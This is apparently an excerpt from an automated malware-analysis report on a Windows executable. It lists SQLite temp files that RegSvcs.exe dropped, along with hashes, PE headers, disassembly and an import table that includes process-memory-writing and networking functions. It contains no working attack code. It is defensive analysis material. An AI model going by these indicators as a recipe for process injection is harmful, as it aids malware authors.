SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC1A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC1B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC2C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC3C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC3D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC4E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC5F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC7F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC80.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD47B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD48B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD49C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD49D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD4AE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.874117767647439
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	K3xL5Xy0XS.exe
File size:	1'058'304 bytes
MD5:	6afdd0cbdf70f3e75f423b1557648e85
SHA1:	6c5cf72a38f08fd41b9f4943efaa4fa3b4d92c66
SHA256:	f5a76af6335f9ea831901a5fac818c22393fdb2d0d9408ce373018b24a2ddb71
SHA512:	b550dbba19c53f55d1433cfbd38fff724c9759da4232597f1b3213e98529f440854a32387eb4a7a7aea2b6a2601816e13b0cfd2ab8712c2f6ef0ec66a2c5028d
SSDEEP:	24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8abXTaR:ATvC/MTQYxsWR7abX
TLSH:	9835AF027391C062FF9BA2334F5AF6515BBC69260123E62F13981D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67635B63 [Wed Dec 18 23:31:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FE8B4B0E2C3h
jmp 00007FE8B4B0DBCFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE8B4B0DDADh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE8B4B0DD7Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FE8B4B1096Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FE8B4B109B8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FE8B4B109A1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x2ba64	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x100000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x2ba64	0x2bc00	c3b7286dd98abfbcbeabf90a9f069624	False	0.8480580357142857	data	7.689522450358481	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x100000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x22d2b	data			1.0003575559995794
RT_GROUP_ICON	0xff4e4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xff55c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xff570	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xff584	0x14	data	English	Great Britain	1.25
RT_VERSION	0xff598	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xff674	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, 